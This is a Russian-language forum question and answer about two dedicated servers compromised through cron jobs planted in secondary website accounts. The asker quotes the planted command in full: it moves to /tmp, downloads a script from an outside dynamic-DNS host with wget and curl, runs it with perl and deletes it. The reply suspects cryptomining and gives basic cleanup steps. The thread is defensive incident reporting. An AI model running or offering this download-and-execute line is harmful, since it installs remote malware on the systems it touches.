У меня есть два выделенных сервера, которые несколько дней назад начали присылать мне уведомления о неизвестных запущенных заданиях cron.
На обоих серверах у меня есть вторичные учетные записи для моих веб-сайтов, и хакер изменил задание cron для этих учетных записей, а не для root. Так что я думаю, что "возможно" у них был только ограниченный доступ.
Оба пытаются запустить следующее: cd /tmp;wgethttp://fastfoodz.dlinkddns.com/abc.txt;curl-Оhttp://fastfoodz.dlinkddns.com/abc.txt;perlabc.txt;rm -f abc*
Вывод Cronjob с первого сервера:
http://pastebin.com/m56ga6pp
Вывод cronjob со второго сервера:
http://pastebin.com/4utZ8agC
Самое странное, что оба сервера, судя по всему, были взломаны одновременно и одним и тем же способом.
Был ли у кого-нибудь именно такой взлом, который может дать мне идеи о том, как он проник внутрь и можно ли его удалить без переустановки?
На серверах находится множество веб-сайтов, и первый из них использует около 500 ГБ, и его перемещение в другое место и переустановка заняли бы немало времени.
Заранее спасибо!
решение1
Глядя на вывод pastebin, становится ясно, что задания cron пытаются генерировать хеши. Я подозреваю, что человек пытается использовать сервер как часть пула для майнинга криптовалюты.
Для получения подробной информации о том, как он проник внутрь, нам понадобятся различные журналы, и вы на 100% уверены, что это не сделал владелец сайта? Вы можете легко удалить cronjob с помощью.
crontab -e
Чтобы не допустить повторного входа в систему, я бы отключил доступ к оболочке для конкретного пользователя, если для этого нет необходимости.
chsh -s /sbin/nologin {username}